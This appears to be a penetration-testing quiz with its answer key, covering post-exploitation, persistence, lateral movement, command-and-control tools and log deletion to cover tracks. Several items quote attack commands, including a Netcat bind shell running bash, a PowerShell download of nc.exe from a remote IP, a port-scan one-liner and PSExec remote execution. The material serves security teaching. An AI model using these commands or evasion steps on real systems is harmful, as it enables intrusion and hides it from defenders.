System Security Management Quiz 8

Which of the following are post-exploitation activities to maintain persistence in a compromised system? A. Creating custom daemons and processes B. Creating and manipulating scheduled jobs and tasks C. All of these D. Creating new users

All of these

Which of the following tasks helps you cover your tracks to remain undetected? A. Deleting application logs B. Deleting temporary files C. All of these D. Suppressing syslog messages

All of these

Which of the following tools can be used for command and control? A. Twittor B. DNSCat2 C. All of these D. Socat

All of these

Which of the following PowerSploit scripts can reflectively inject a DLL into a remote process? A. Invoke-ReflectivePEInjection B. PSdll C. PSExec D. Inject-ReflectivePE

Invoke-ReflectivePEInjection

Which of the following is not true? A. Lateral movement can only be done using Nmap after compromising a system because it allows stealth attacks. B. After compromising a system, it is possible to use basic port scans to identify systems or services of interest that you can further attack in an attempt to compromise valuable information. C. Lateral movement involves scanning a network for other systems, exploiting vulnerabilities in other systems, compromising credentials, and collecting sensitive information for exfiltration. D. Lateral movement is possible if an organization does not segment its network properly.

Lateral movement can only be done using Nmap after compromising a system because it allows stealth attacks.

What is the following PowerShell command doing? 1..1024 | % {echo ((new-object Net.Sockets.TcpClient). Connect("10.1.2.3",$_))"$_ is open!"} 2>$null A. Performing a reflected XSS against the 10.1.2.3 host B. Launching a port scan to the 10.1.2.3 host (scanning for ports 1 through 1024) C. Performing a stored XSS against the 10.1.2.3 host D. Performing a reflected XSS from the 10.1.2.3 host

Launching a port scan to the 10.1.2.3 host (scanning for ports 1 through 1024)

Complete the following command to launch the calculator on a compromised Windows system: ___________ \\VICTIM -d -i calc.exe A. msfexec B. meterpreter C. PlowerSploit D. PSExec

PSExec

What is another term for lateral movement? A. Reflected XSS B. Pivoting C. Reflected amplification attack D. Persistent XSS

Pivoting

Which of the following is a collection of PowerShell modules that can be used for post-exploitation and other phases of an assessment? A. PSExec B. PowerShellPloit C. PowerSploit D. WMI and WinRM

PowerSploit

Which of the following is not a legitimate Windows tool that can be used for post-exploitation tasks? A. PowerSploit B. PowerShell C. WMI D. PSExec

PowerSploit

Which of the following can be used for lateral movement? A. RDP, Apple Remote Desktop, and VNC B. Blind SQL injection C. Directory traversal attacks D. Reflected XSS

RDP, Apple Remote Desktop, and VNC

Which of the following is typically not used as a post-exploitation tool? A. PowerSploit B. Empire C. SET D. Mimikatz

SET

Which of the following describes what the nc -lvp 2233 -e /bin/bash command does? A. The Netcat utility is used to create a reverse shell on the victim system and to execute the bash shell. B. The Netcat utility is used to create a bind shell on the victim system and to execute the bash shell. C. The Netcat utility is used to create a reverse shell on the attacking system and to exclude the bash shell from being executed. D. The Netcat utility is used to create a reverse shell on the victim system and to exclude the bash shell from being executed.

The Netcat utility is used to create a bind shell on the victim system and to execute the bash shell.

Consider the following example: (New-Object System.Net.WebClient).DownloadFile("http://192.168.78.147/nc.exe","nc.exe") What is this code doing? A. The Netcat utility is uploading files to 192.168.78.147. B. The New-ObjectSystem.Net.WebClient PowerShell script is downloading a file from 192.168.78.147. C. The New-ObjectSystem.Net.WebClient PowerSploit Linux utility is downloading a file from 192.168.78.147. D. The Netcat utility is downloading files from 192.168.78.147.

The New-ObjectSystem.Net.WebClient PowerShell script is downloading a file from 192.168.78.147.

Which of the following is not true? A. You should return any modified systems and their configuration to their original values and parameters. B. As a best practice, you should delete all files, executable binaries, scripts, and temporary files from compromised systems after the penetration testing engagement is completed. C. As a best practice, you can discuss post-engagement cleanup tasks and document them in the rules of engagement document during the pre-engagement phase. D. The client that hired an ethical hacker is liable for cleaning up the systems after a penetration testing engagement.

The client that hired an ethical hacker is liable for cleaning up the systems after a penetration testing engagement.

Which of the following tools can be used to perform many data-gathering operations and can be used by malware to perform different activities in a compromised system? A. WMIExec B. WMI C. WIM D. PSploit

WMI

Which of the following commands creates a listener on a system on port 8899? A. nl -cp 8899 B. nc -nv 8899 C. nc -lvp 8899 D. nc host 10.1.1.1 port 8899

nc -lvp 8899

Which of the following commands launches a simple HTTP web service that serves the file on the present working directory? A. msf -m SimpleHTTPServer B. msfconsole -m SimpleHTTPServer C. ngnix -m SimpleHTTPServer D. python -m SimpleHTTPServer

python -m SimpleHTTPServer